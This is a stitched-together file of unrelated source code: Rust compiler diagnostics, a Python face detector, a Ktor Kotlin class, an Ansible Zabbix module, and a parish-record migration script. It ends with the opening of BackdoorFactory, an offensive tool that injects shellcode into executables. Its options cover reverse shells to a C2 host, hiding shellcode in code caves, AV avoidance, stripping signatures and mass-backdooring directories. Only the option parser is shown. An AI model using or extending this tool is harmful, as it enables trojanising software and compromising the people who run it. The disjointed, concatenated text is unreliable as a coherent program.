			return this.field;
		}

	}

}
use std::fmt::Write;
use rustc_hir::attrs::AttributeKind;
use rustc_hir::def_id::{CRATE_DEF_ID, LocalDefId};
use rustc_hir::find_attr;
use rustc_middle::ty::{GenericArgs, TyCtxt};
/// Renders the variances of `def_id`'s generic parameters as
/// `[P1: V1, P2: V2, ...]`.
fn format_variances(tcx: TyCtxt<'_>, def_id: LocalDefId) -> String {
    let variances = tcx.variances_of(def_id);
    let generics = GenericArgs::identity_for_item(tcx, def_id);
    let mut rendered = String::from("[");
    // Insert the separator *between* entries instead of appending it after
    // every entry and trimming the trailing one.
    let mut first = true;
    for (arg, variance) in generics.iter().zip(variances.iter()) {
        if !first {
            rendered.push_str(", ");
        }
        first = false;
        write!(rendered, "{arg}: {variance:?}").unwrap();
    }
    rendered.push(']');
    rendered
}
/// Emits a `VariancesOf` diagnostic for every item that opted in via
/// `#[rustc_variance]`, and — when the crate root carries
/// `#[rustc_variance_of_opaques]` — for every opaque type as well.
pub(crate) fn variances(tcx: TyCtxt<'_>) {
    let crate_items = tcx.hir_crate_items(());
    // Crate-level attribute: dump variances for all opaque types.
    if find_attr!(tcx.get_all_attrs(CRATE_DEF_ID), AttributeKind::RustcVarianceOfOpaques) {
        for id in crate_items.opaques() {
            tcx.dcx().emit_err(crate::errors::VariancesOf {
                span: tcx.def_span(id),
                variances: format_variances(tcx, id),
            });
        }
    }
    for id in crate_items.free_items() {
        // Per-item attribute opts the item into variance dumping.
        if !find_attr!(tcx.get_all_attrs(id.owner_id), AttributeKind::RustcVariance) {
            continue;
        }
        tcx.dcx().emit_err(crate::errors::VariancesOf {
            span: tcx.def_span(id.owner_id),
            variances: format_variances(tcx, id.owner_id.def_id),
        });
    }
}
import numpy as np
from scipy import ndimage, misc
from matplotlib import pyplot as plt
import glob
from MyViola import MyViolaClassifier
from Svm import Svm
import funcs
# Scan `img` at several scales for the single best-scoring `shape`-sized
# window according to classifier `mv`; returns ((row1, row2), (col1, col2))
# mapped back to original-image coordinates.
# NOTE(review): if no window ever scores above 0, the zero-initialised
# `res_i`/`res_j` are returned, i.e. a degenerate rectangle at the origin.
# NOTE(review): scipy.misc.imresize/imread were removed in modern SciPy —
# confirm the pinned scipy version for this project.
def find_face(img, shape, mv):
res_i = (0, 0)
res_j = (0, 0)
res_scl = 1
max_ = 0
scales = np.arange(.2, .35, .025)
m, n = shape
for scl in scales:
img_ = misc.imresize(img, scl)
mv.change_image(img_)
x, y = img_.shape[:2]
# skip scales where the rescaled image is smaller than the window
if x < m or y < n:
continue
for i, j in funcs.iter_shape((x, y), shape, 4):
val = mv.valuefy((i, j))
if val > max_:
max_ = val
res_i, res_j = i, j
res_scl = scl
# divide by the scale to translate back to original-image coordinates
return (int(res_i[0] / res_scl), int(res_i[1] / res_scl)), (int(res_j[0] / res_scl), int(res_j[1] / res_scl))
def get_sub_pics_with_size(imgs, shape):
    """Yield every (m, n) window tiled across several rescaled copies of
    each image in `imgs`, halving any image taller than 800px first."""
    scales = np.arange(.2, 1, .2)
    m, n = shape
    for image in imgs:
        # shrink very large images before scanning
        while image.shape[0] > 800:
            image = misc.imresize(image, 0.5)
        for scale in scales:
            scaled = misc.imresize(image, scale)
            rows, cols = scaled.shape[:2]
            # skip scales where the window no longer fits
            if rows < m or cols < n:
                continue
            for top in range(0, rows - m, m):
                for left in range(0, cols - n, n):
                    yield scaled[top:top + m, left:left + n]
# One-off training/cropping script: trains MyViolaClassifier on cropped face
# and no-face images, saves the model, then crops the detected face out of
# every image in ../../faces and writes it under faces\new1\.
# NOTE(review): paths are hardcoded and mix / and \ separators — Windows-only
# as written; confirm before reuse.
def temp():
files = glob.glob('../../faces/cropped/*.jpg')
faces = (misc.imread(im) for im in files)
mv = MyViolaClassifier()
mv.add_examples(faces, 1)
files = glob.glob('../../faces/nofaces/*.jpg')
nofaces = (misc.imread(im) for im in files)
# negative examples: all (137, 100) windows cut from the no-face images
mv.add_examples(get_sub_pics_with_size(nofaces, (137, 100)), -1)
mv.learn()
mv.save('my_viola.pkl')
files = glob.glob('../../faces/*.jpg')
for f in files:
img = misc.imread(f)
new_path = f.replace('/faces\\', '/faces\\new1\\')
i, j = find_face(img, (137, 100), mv)
i1, i2 = i
j1, j2 = j
new_img = img[i1:i2, j1:j2]
# imsave raises ValueError on empty crops (no face found); skip those
try:
misc.imsave(new_path, new_img)
except ValueError:
pass
# Convenience wrapper: detect all faces in `img` and draw their rectangles.
def plot_image_faces(img, shape, mv):
plot_im_with_rects(img, get_all_faces_rects(img, shape, mv))
def plot_im_with_rects(img, rect_list):
    """Draw a green rectangle for every rect in `rect_list` onto `img`
    (via funcs.implusrect) and display the result with matplotlib."""
    annotated = img
    for rect in rect_list:
        rows, cols = rect
        annotated = funcs.implusrect(annotated, rows, cols, (0, 255, 0))
    plt.imshow(annotated)
def get_all_faces_rects(img, shape, mv):
    """Return the rectangles of all detected faces, after suppressing
    overlapping detections in favour of the highest-scoring one."""
    windows = get_all_windows(img, shape, mv)
    return [rect for rect, _score in filter_overlap_windows(windows)]
# Generator over every positively-scoring `shape`-sized window across several
# scales of `img`; yields ((rows, cols), score) with coordinates translated
# back to original-image space.
def get_all_windows(img, shape, mv):
scales = np.arange(.2, .35, .02)
m, n = shape
for scl in scales:
img_ = misc.imresize(img, scl)
mv.change_image(img_)
x, y = img_.shape[:2]
# skip scales where the rescaled image is smaller than the window
if x < m or y < n:
continue
for i, j in funcs.iter_shape((x, y), shape, 4):
val = mv.valuefy((i, j))
# only windows the classifier scores positive are candidates
if val > 0:
res_i = (int(i[0] / scl), int(i[1] / scl))
res_j = (int(j[0] / scl), int(j[1] / scl))
yield ((res_i, res_j), val)
def is_pos_in_rect(pos, rect):
    """Return True when point `pos` = (row, col) lies inside `rect`, given
    as ((row_min, row_max), (col_min, col_max)); edges are inclusive."""
    row, col = pos
    (row_min, row_max), (col_min, col_max) = rect
    if row < row_min or row > row_max:
        return False
    return col_min <= col <= col_max
def mid_point(rect):
    """Return the (row, col) midpoint of `rect`, truncated to ints."""
    rows, cols = rect
    row_mid = int(sum(rows) / 2)
    col_mid = int(sum(cols) / 2)
    return row_mid, col_mid
def are_overlap(window1, window2):
    """Two windows overlap when the midpoint of either one lies inside
    the other."""
    if is_pos_in_rect(mid_point(window1), window2):
        return True
    return is_pos_in_rect(mid_point(window2), window1)
def filter_overlap_windows(windows):
    """Greedy non-maximum suppression over (rect, score) pairs.

    For each incoming window, the first kept window it overlaps is replaced
    when the newcomer scores higher; windows overlapping nothing are kept
    as new entries. Returns the surviving (rect, score) pairs.
    """
    kept = []
    for window in windows:
        matched = False
        for idx, best in enumerate(kept):
            if are_overlap(window[0], best[0]):
                if window[1] > best[1]:
                    kept[idx] = window
                matched = True
                break
        if not matched:
            kept.append(window)
    return kept
/*
* Copyright 2014-2019 JetBrains s.r.o and contributors. Use of this source code is governed by the Apache 2.0 license.
*/
package io.ktor.network.selector
import kotlinx.coroutines.*
import java.util.concurrent.atomic.*
/**
 * Holds at most one suspended coroutine per selection interest
 * (read / write / connect / accept) for a single selectable.
 *
 * Each interest is a dedicated volatile field updated lock-free through a
 * per-interest [AtomicReferenceFieldUpdater], so registration and removal
 * are race-safe without locking.
 */
public class InterestSuspensionsMap {
@Volatile
private var readHandlerReference: CancellableContinuation<Unit>? = null
@Volatile
private var writeHandlerReference: CancellableContinuation<Unit>? = null
@Volatile
private var connectHandlerReference: CancellableContinuation<Unit>? = null
@Volatile
private var acceptHandlerReference: CancellableContinuation<Unit>? = null
// Registers `continuation` for `interest`; fails loudly if a continuation
// is already registered for that interest (CAS from null).
public fun addSuspension(interest: SelectInterest, continuation: CancellableContinuation<Unit>) {
val updater = updater(interest)
if (!updater.compareAndSet(this, null, continuation)) {
error("Handler for ${interest.name} is already registered")
}
}
// Runs `block` on (and atomically removes) every continuation whose
// interest flag is set in `readyOps`.
public inline fun invokeForEachPresent(readyOps: Int, block: CancellableContinuation<Unit>.() -> Unit) {
val flags = SelectInterest.flags
for (ordinal in flags.indices) {
if (flags[ordinal] and readyOps != 0) {
removeSuspension(ordinal)?.block()
}
}
}
// Runs `block` on (and atomically removes) every registered continuation,
// regardless of readiness.
public inline fun invokeForEachPresent(block: CancellableContinuation<Unit>.(SelectInterest) -> Unit) {
for (interest in SelectInterest.AllInterests) {
removeSuspension(interest)?.run { block(interest) }
}
}
// Atomically detaches and returns the continuation for `interest`, if any.
public fun removeSuspension(interest: SelectInterest): CancellableContinuation<Unit>? =
updater(interest).getAndSet(this, null)
public fun removeSuspension(interestOrdinal: Int): CancellableContinuation<Unit>? =
updaters[interestOrdinal].getAndSet(this, null)
override fun toString(): String {
return "R $readHandlerReference W $writeHandlerReference C $connectHandlerReference A $acceptHandlerReference"
}
public companion object {
@Suppress("UNCHECKED_CAST")
// One field updater per interest, indexed by SelectInterest.ordinal;
// the property is resolved by name so the mapping survives renames.
private val updaters = SelectInterest.AllInterests.map { interest ->
val property = when (interest) {
SelectInterest.READ -> InterestSuspensionsMap::readHandlerReference
SelectInterest.WRITE -> InterestSuspensionsMap::writeHandlerReference
SelectInterest.ACCEPT -> InterestSuspensionsMap::acceptHandlerReference
SelectInterest.CONNECT -> InterestSuspensionsMap::connectHandlerReference
}
AtomicReferenceFieldUpdater.newUpdater(
InterestSuspensionsMap::class.java,
CancellableContinuation::class.java,
property.name
) as AtomicReferenceFieldUpdater<InterestSuspensionsMap, CancellableContinuation<Unit>?>
}.toTypedArray()
private fun updater(
interest: SelectInterest
): AtomicReferenceFieldUpdater<InterestSuspensionsMap, CancellableContinuation<Unit>?> =
updaters[interest.ordinal]
}
}
#!/usr/bin/env python
'''
Ansible module for zabbix graphprototypes
'''
# vim: expandtab:tabstop=4:shiftwidth=4
#
# Zabbix graphprototypes ansible module
#
#
# Copyright 2015 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#---
#- hosts: localhost
# gather_facts: no
# tasks:
# - zbx_graphprototype:
# zbx_server: https://zabbixserver/zabbix/api_jsonrpc.php
# zbx_user: Admin
# zbx_password: zabbix
# name: Test Graph
# height: 300
# width: 500
# graph_items:
# - item_name: Bytes per second IN on network interface {#OSO_NET_INTERFACE}
# color: red
# line_style: bold
# item_type: prototype
# - item_name: Template OS Linux: Bytes per second OUT on network interface {#OSO_NET_INTERFACE}
# item_type: prototype
#
#
# This is in place because each module looks similar to each other.
# These need duplicate code as their behavior is very similar
# but different for each zabbix class.
# pylint: disable=duplicate-code
# pylint: disable=import-error
from openshift_tools.monitoring.zbxapi import ZabbixAPI, ZabbixConnection
def exists(content, key='result'):
    ''' Check if key exists in content and content[key] is non-empty.

    Returns True only when `key` is present and its value is truthy.
    '''
    # `key in content` replaces the Python-2-only dict.has_key() and works
    # on both Python 2 and 3; bool() normalises the truthiness check.
    return key in content and bool(content[key])
def get_graph_type(graphtype):
    '''
    Map a graph-type name to the Zabbix API constant.
    Possible values:
    0 - normal;
    1 - stacked;
    2 - pie;
    3 - exploded;
    '''
    # substring match, first hit wins; anything unrecognised is "normal"
    for token, api_value in (('stacked', 1), ('pie', 2), ('exploded', 3)):
        if token in graphtype:
            return api_value
    return 0
def get_show_legend(show_legend):
    '''Get the value for show_legend
    0 - hide
    1 - (default) show
    '''
    return 0 if show_legend == 'hide' else 1
def get_template_id(zapi, template_name):
    '''Fetch the templateid of the first template whose host matches
    template_name.

    Returns None when the API reports no result (missing or empty).
    '''
    # Fetch templates by name
    content = zapi.get_content('template',
                               'get',
                               {'filter': {'host': template_name},})
    # Truthy .get() replaces the Python-2-only dict.has_key() and also
    # guards against an IndexError when 'result' is present but empty.
    if content.get('result'):
        return content['result'][0]['templateid']
    return None
def get_color(color_in='black'):
    ''' Receive a color and translate it to a hex representation of the color
    Will have a few setup by default.

    Unknown values are passed through unchanged, so callers may supply a
    hex string directly.
    '''
    colors = {'black': '000000',
              'red': 'FF0000',
              'pink': 'FFC0CB',
              'purple': '800080',
              'orange': 'FFA500',
              'gold': 'FFD700',
              'yellow': 'FFFF00',
              'green': '008000',
              'cyan': '00FFFF',
              'aqua': '00FFFF',
              'blue': '0000FF',
              'brown': 'A52A2A',
              'gray': '808080',
              'grey': '808080',
              'silver': 'C0C0C0',
              }
    # dict.get replaces the Python-2-only dict.has_key() lookup-then-index
    return colors.get(color_in, color_in)
def get_line_style(style):
    '''Determine the Zabbix draw-type constant for a line style name.

    Unknown styles fall back to 0 (plain line).
    '''
    line_style = {'line': 0,
                  'filled': 1,
                  'bold': 2,
                  'dot': 3,
                  'dashed': 4,
                  'gradient': 5,
                  }
    # dict.get replaces the Python-2-only dict.has_key() lookup-then-index
    return line_style.get(style, 0)
def get_calc_function(func):
    '''Determine the calculation function constant; defaults to avg (2).'''
    # substring match, first hit wins
    for token, api_value in (('min', 1), ('max', 4), ('all', 7), ('last', 9)):
        if token in func:
            return api_value
    return 2
def get_graph_item_type(gtype):
    '''Determine the graph item type: 2 for 'sum' (graph sum), else 0
    (simple).'''
    return 2 if 'sum' in gtype else 0
def get_graph_items(zapi, gitems):
    '''Resolve each user-supplied graph item into the dict shape the
    Zabbix API expects (itemid/color/drawtype/calc_fnc/type).

    Items whose name the API cannot resolve are silently skipped.
    NOTE: mutates the dicts in `gitems` (pops 'item_name' and 'color').
    '''
    r_items = []
    for item in gitems:
        # item_type (e.g. 'prototype') selects the API class: item/itemprototype
        content = zapi.get_content('item%s' % item.get('item_type', ''),
                                   'get',
                                   {'filter': {'name': item['item_name']}})
        item.pop('item_name')
        color = get_color(item.pop('color', 'black'))
        drawtype = get_line_style(item.get('line_style', 'line'))
        func = get_calc_function(item.get('calc_func', 'avg'))
        g_type = get_graph_item_type(item.get('graph_item_type', 'simple'))
        # Truthy .get() replaces the Python-2-only dict.has_key() and also
        # guards against an IndexError when 'result' is present but empty.
        if content.get('result'):
            r_items.append({'itemid': content['result'][0]['itemid'],
                            'color': color,
                            'drawtype': drawtype,
                            'calc_fnc': func,
                            'type': g_type,
                            })
    return r_items
def compare_gitems(zabbix_items, user_items):
    '''Compare zabbix results with the user's supplied items.

    Returns True when the lists are the same length and every user item's
    values match the zabbix item with the same itemid (zabbix returns all
    values as strings, so comparison is done via str()).
    '''
    if len(zabbix_items) != len(user_items):
        return False
    for user_item in user_items:
        for zab_item in zabbix_items:
            if user_item['itemid'] != zab_item['itemid']:
                continue
            for key, value in user_item.items():
                if str(value) != zab_item[key]:
                    return False
    return True
# The branches are needed for CRUD and error handling
# pylint: disable=too-many-branches
# The branches are needed for CRUD and error handling
# pylint: disable=too-many-branches
def main():
'''
ansible zabbix module for zbx_graphprototypes

Implements list/absent/present states against the Zabbix graphprototype
API class, diffing existing objects against the requested params before
issuing an update.
'''
module = AnsibleModule(
argument_spec=dict(
zbx_server=dict(default='https://localhost/zabbix/api_jsonrpc.php', type='str'),
zbx_user=dict(default=os.environ.get('ZABBIX_USER', None), type='str'),
zbx_password=dict(default=os.environ.get('ZABBIX_PASSWORD', None), type='str'),
zbx_debug=dict(default=False, type='bool'),
name=dict(default=None, type='str'),
height=dict(default=None, type='int'),
width=dict(default=None, type='int'),
graph_type=dict(default='normal', type='str'),
show_legend=dict(default='show', type='str'),
state=dict(default='present', type='str'),
graph_items=dict(default=None, type='list'),
),
#supports_check_mode=True
)
zapi = ZabbixAPI(ZabbixConnection(module.params['zbx_server'],
module.params['zbx_user'],
module.params['zbx_password'],
module.params['zbx_debug']))
#Set the instance and the template for the rest of the calls
zbx_class_name = 'graphprototype'
state = module.params['state']
# Look up any existing graphprototype by name, including its graph items
# so 'present' can diff them below.
content = zapi.get_content(zbx_class_name,
'get',
{'filter': {'name': module.params['name']},
#'templateids': templateid,
'selectGraphItems': 'extend',
})
#******#
# GET
#******#
if state == 'list':
module.exit_json(changed=False, results=content['result'], state="list")
#******#
# DELETE
#******#
if state == 'absent':
if not exists(content):
module.exit_json(changed=False, state="absent")
content = zapi.get_content(zbx_class_name, 'delete', [content['result'][0]['graphid']])
module.exit_json(changed=True, results=content['result'], state="absent")
# Create and Update
if state == 'present':
params = {'name': module.params['name'],
'height': module.params['height'],
'width': module.params['width'],
'graphtype': get_graph_type(module.params['graph_type']),
'show_legend': get_show_legend(module.params['show_legend']),
'gitems': get_graph_items(zapi, module.params['graph_items']),
}
# Remove any None valued params
# NOTE(review): popping inside a comprehension over params.keys() is a
# Python-2 idiom; under Python 3 this mutates the dict during iteration.
_ = [params.pop(key, None) for key in params.keys() if params[key] is None]
#******#
# CREATE
#******#
if not exists(content):
content = zapi.get_content(zbx_class_name, 'create', params)
# NOTE(review): dict.has_key() is Python-2-only; 'error' in content
# would be the portable form.
if content.has_key('error'):
module.exit_json(failed=True, changed=True, results=content['error'], state="present")
module.exit_json(changed=True, results=content['result'], state='present')
########
# UPDATE
########
differences = {}
zab_results = content['result'][0]
# Zabbix returns all scalar values as strings, so compare both raw and
# str() forms; gitems need the dedicated comparison helper.
for key, value in params.items():
if key == 'gitems':
if not compare_gitems(zab_results[key], value):
differences[key] = value
elif zab_results[key] != value and zab_results[key] != str(value):
differences[key] = value
if not differences:
module.exit_json(changed=False, results=zab_results, state="present")
# We have differences and need to update
differences['graphid'] = zab_results['graphid']
content = zapi.get_content(zbx_class_name, 'update', differences)
if content.has_key('error'):
module.exit_json(failed=True, changed=False, results=content['error'], state="present")
module.exit_json(changed=True, results=content['result'], state="present")
# Fallthrough: any unrecognised state is reported as a failure.
module.exit_json(failed=True,
changed=False,
results='Unknown state passed. %s' % state,
state="unknown")
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import, locally-disabled
# import module snippets. This are required
from ansible.module_utils.basic import *
main() | unknown | codeparrot/codeparrot-clean | ||
__copyright__ = 'Copyright(c) Gordon Elliott 2017'
"""
"""
import logging
from datetime import datetime
from glod.db.person import Person
from glod.db.organisation import Organisation, OrganisationCategory, OrganisationStatus
from glod.model.communication_permission import CommunicationPermission
from glod.db.organisation_address import OrganisationAddress
LOG = logging.getLogger(__file__)
INITIAL_GDPR_SURVEY = datetime(2018, 10, 30)
TRUE_STRINGS = ("true", "True", "TRUE", "yes", "Yes", "YES", "1")
IS_PRIMARY = 'primary'
# Convert one legacy parishioner record into model entities: an Organisation
# ("household", created once per household_ref_no and cached in household_map),
# an OrganisationAddress link, a Person, and their CommunicationPermission.
# Returns the list of newly-created entities (household + link only on first
# sighting of the household).
def _reorganise_parishioner(parishioner, address_map, household_map):
new_entities = []
parishioner_status = parishioner.status.lower()
# 'foreign list' records become active non-local households; everything
# else is a local household whose activity follows the 'active' flag.
if parishioner_status == 'foreign list':
organisation_status = OrganisationStatus.Active
organisation_category = OrganisationCategory.NonLocalHousehold
else:
organisation_status = OrganisationStatus.Active if parishioner_status == 'active' else OrganisationStatus.Inactive
organisation_category = OrganisationCategory.Household
household_ref_no = parishioner.household_ref_no
if household_ref_no in household_map:
household = household_map[household_ref_no]
else:
# first member of this household: create it and link its address
household = Organisation(
parishioner.surname,
organisation_category,
organisation_status,
household_ref_no,
)
# assumes every household_ref_no has an entry in address_map — a
# missing address raises KeyError; TODO confirm upstream guarantees
address = address_map[household_ref_no]
oa_link = OrganisationAddress(household, address)
household_map[household_ref_no] = household
new_entities = [household, oa_link]
person = Person(
household,
parishioner.surname,
parishioner.first_name,
title=parishioner.title,
mobile=parishioner.mobile,
other_phone=parishioner.other,
email=parishioner.email,
parishioner_reference_no=parishioner.reference_no,
)
# GDPR contact preferences; source fields are strings, hence the
# TRUE_STRINGS membership tests
communication_preferences = CommunicationPermission(
person,
parishioner.main_contact == IS_PRIMARY,
INITIAL_GDPR_SURVEY,
parishioner.by_email in TRUE_STRINGS,
parishioner.by_phone in TRUE_STRINGS,
parishioner.by_post in TRUE_STRINGS,
parishioner.news in TRUE_STRINGS,
parishioner.finance in TRUE_STRINGS,
)
new_entities += [person, communication_preferences]
return new_entities
def reorganise_parishioners(session, parishioners, address_map):
    """Convert every legacy parishioner record into model entities and
    register them all with the SQLAlchemy session."""
    households = {}
    for record in parishioners:
        entities = _reorganise_parishioner(record, address_map, households)
        session.add_all(entities)
#!/usr/bin/env python
'''
BackdoorFactory (BDF) v3 - FOUNTAINPATCH
Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org--
Without him, I would still be trying to do stupid things
with the elf format.
Also thanks to Silvio Cesare with his 1998 paper
(http://vxheaven.org/lib/vsc01.html) which these ELF patching
techniques are based on.
Special thanks to Travis Morrow for poking holes in my ideas.
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import sys
import os
import signal
import time
from random import choice
from optparse import OptionParser
from pebin import pebin
from elfbin import elfbin
from machobin import machobin
# SIGINT handler: exit cleanly on Ctrl-C instead of dumping a
# KeyboardInterrupt traceback.
# NOTE(review): the `signal` parameter shadows the imported signal module
# inside this function.
def signal_handler(signal, frame):
print '\nProgram Exit'
sys.exit(0)
# NOTE(review): everything in this class body — option parsing and the whole
# patching workflow below — executes at class-definition time (module import),
# not when bdfMain() is instantiated.
class bdfMain():
version = """\
Version: 3.0.5
"""
author = """\
Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmail<d o-t>com
Twitter: @midnite_runr
IRC: freenode.net #BDFactory
"""
#ASCII ART
# Three alternative banner strings; one is picked at random at startup.
menu = ["-.(`-') (`-') _ <-"
".(`-') _(`-') (`-')\n"
"__( OO) (OO ).-/ _ __( OO)"
"( (OO ).-> .-> .-> <-.(OO ) \n"
"'-'---.\ / ,---. \-,-----.'-'. ,--"
".\ .'_ (`-')----. (`-')----. ,------,) \n"
"| .-. (/ | \ /`.\ | .--./| .' /"
"'`'-..__)( OO).-. '( OO).-. '| /`. ' \n"
"| '-' `.) '-'|_.' | /_) (`-')| /)"
"| | ' |( _) | | |( _) | | || |_.' | \n"
"| /`'. |(| .-. | || |OO )| . ' |"
" | / : \| |)| | \| |)| || . .' \n"
"| '--' / | | | |(_' '--'\| |\ \|"
" '-' / ' '-' ' ' '-' '| |\ \ \n"
"`------' `--' `--' `-----'`--' '--'"
"`------' `-----' `-----' `--' '--' \n"
" (`-') _ (`-') "
" (`-') \n"
" <-. (OO ).-/ _ ( OO).-> "
" .-> <-.(OO ) .-> \n"
"(`-')-----./ ,---. \-,-----./ '._"
" (`-')----. ,------,) ,--.' ,-. \n"
"(OO|(_\---'| \ /`.\ | .--./|'--...__)"
"( OO).-. '| /`. '(`-')'.' / \n"
" / | '--. '-'|_.' | /_) (`-')`--. .--'"
"( _) | | || |_.' |(OO \ / \n"
" \_) .--'(| .-. | || |OO ) | | "
" \| |)| || . .' | / /) \n"
" `| |_) | | | |(_' '--'\ | | "
" ' '-' '| |\ \ `-/ /` \n"
" `--' `--' `--' `-----' `--' "
" `-----' `--' '--' `--' \n",
"__________ "
" __ .___ \n"
"\______ \_____ ____ "
"| | __ __| _/____ ___________ \n"
" | | _/\__ \ _/ ___\|"
" |/ // __ |/ _ \ / _ \_ __ \ \n"
" | | \ / __ \\\\ \__"
"_| </ /_/ ( <_> | <_> ) | \/\n"
" |______ /(____ /\___ >"
"__|_ \____ |\____/ \____/|__| \n"
" \/ \/ \/"
" \/ \/ \n"
"___________ "
"__ \n"
"\_ _____/____ _____/"
" |_ ___________ ___.__. \n"
" | __) \__ \ _/ ___\ "
" __\/ _ \_ __ < | | \n"
" | \ / __ \\\\ \__"
"_| | ( <_> ) | \/\___ | \n"
" \___ / (____ /\___ >_"
"_| \____/|__| / ____| \n"
" \/ \/ \/ "
" \/ \n",
" ____ ____ ______ "
" __ \n"
" / __ )/ __ \/ ____/___ "
"______/ /_____ _______ __\n"
" / __ / / / / /_ / __ `/"
" ___/ __/ __ \/ ___/ / / /\n"
" / /_/ / /_/ / __/ / /_/ /"
" /__/ /_/ /_/ / / / /_/ /\n"
"/_____/_____/_/ \__,_/"
"\___/\__/\____/_/ \__, /\n"
" "
" /____/\n"]
# Install the Ctrl-C handler before any long-running work starts.
signal.signal(signal.SIGINT, signal_handler)
# Command-line interface: every knob of the patching workflow is an
# OptionParser option; parsing happens immediately below the definitions.
parser = OptionParser()
parser.add_option("-f", "--file", dest="FILE", action="store",
type="string",
help="File to backdoor")
parser.add_option("-s", "--shell", default="show", dest="SHELL",
action="store", type="string",
help="Payloads that are available for use."
" Use 'show' to see payloads."
)
parser.add_option("-H", "--hostip", default=None, dest="HOST",
action="store", type="string",
help="IP of the C2 for reverse connections.")
parser.add_option("-P", "--port", default=None, dest="PORT",
action="store", type="int",
help="The port to either connect back to for reverse "
"shells or to listen on for bind shells")
parser.add_option("-J", "--cave_jumping", dest="CAVE_JUMPING",
default=False, action="store_true",
help="Select this options if you want to use code cave"
" jumping to further hide your shellcode in the binary."
)
parser.add_option("-a", "--add_new_section", default=False,
dest="ADD_SECTION", action="store_true",
help="Mandating that a new section be added to the "
"exe (better success) but less av avoidance")
parser.add_option("-U", "--user_shellcode", default=None,
dest="SUPPLIED_SHELLCODE", action="store",
help="User supplied shellcode, make sure that it matches"
" the architecture that you are targeting."
)
parser.add_option("-c", "--cave", default=False, dest="FIND_CAVES",
action="store_true",
help="The cave flag will find code caves that "
"can be used for stashing shellcode. "
"This will print to all the code caves "
"of a specific size."
"The -l flag can be use with this setting.")
parser.add_option("-l", "--shell_length", default=380, dest="SHELL_LEN",
action="store", type="int",
help="For use with -c to help find code "
"caves of different sizes")
parser.add_option("-o", "--output-file", default=None, dest="OUTPUT",
action="store", type="string",
help="The backdoor output file")
parser.add_option("-n", "--section", default="sdata", dest="NSECTION",
action="store", type="string",
help="New section name must be "
"less than seven characters")
parser.add_option("-d", "--directory", dest="DIR", action="store",
type="string",
help="This is the location of the files that "
"you want to backdoor. "
"You can make a directory of file backdooring faster by "
"forcing the attaching of a codecave "
"to the exe by using the -a setting.")
parser.add_option("-w", "--change_access", default=True,
dest="CHANGE_ACCESS", action="store_false",
help="This flag changes the section that houses "
"the codecave to RWE. Sometimes this is necessary. "
"Enabled by default. If disabled, the "
"backdoor may fail.")
parser.add_option("-i", "--injector", default=False, dest="INJECTOR",
action="store_true",
help="This command turns the backdoor factory in a "
"hunt and shellcode inject type of mechanism. Edit "
"the target settings in the injector module.")
parser.add_option("-u", "--suffix", default=".old", dest="SUFFIX",
action="store", type="string",
help="For use with injector, places a suffix"
" on the original file for easy recovery")
parser.add_option("-D", "--delete_original", dest="DELETE_ORIGINAL",
default=False, action="store_true",
help="For use with injector module. This command"
" deletes the original file. Not for use in production "
"systems. *Author not responsible for stupid uses.*")
parser.add_option("-O", "--disk_offset", dest="DISK_OFFSET", default=0,
type="int", action="store",
help="Starting point on disk offset, in bytes. "
"Some authors want to obfuscate their on disk offset "
"to avoid reverse engineering, if you find one of those "
"files use this flag, after you find the offset.")
parser.add_option("-S", "--support_check", dest="SUPPORT_CHECK",
default=False, action="store_true",
help="To determine if the file is supported by BDF prior"
" to backdooring the file. For use by itself or with "
"verbose. This check happens automatically if the "
"backdooring is attempted."
)
parser.add_option("-M", "--cave-miner", dest="CAVE_MINER", default=False, action="store_true",
help="Future use, to help determine smallest shellcode possible in a PE file"
)
parser.add_option("-q", "--no_banner", dest="NO_BANNER", default=False, action="store_true",
help="Kills the banner."
)
parser.add_option("-v", "--verbose", default=False, dest="VERBOSE",
action="store_true",
help="For debug information output.")
parser.add_option("-T", "--image-type", dest="IMAGE_TYPE", default="ALL",
type='string',
action="store", help="ALL, x86, or x64 type binaries only. Default=ALL")
parser.add_option("-Z", "--zero_cert", dest="ZERO_CERT", default=True, action="store_false",
help="Allows for the overwriting of the pointer to the PE certificate table"
" effectively removing the certificate from the binary for all intents"
" and purposes."
)
parser.add_option("-R", "--runas_admin", dest="CHECK_ADMIN", default=False, action="store_true",
help="Checks the PE binaries for \'requestedExecutionLevel level=\"highestAvailable\"\'"
". If this string is included in the binary, it must run as system/admin. Doing this "
"slows patching speed significantly."
)
parser.add_option("-L", "--patch_dll", dest="PATCH_DLL", default=True, action="store_false",
help="Use this setting if you DON'T want to patch DLLs. Patches by default."
)
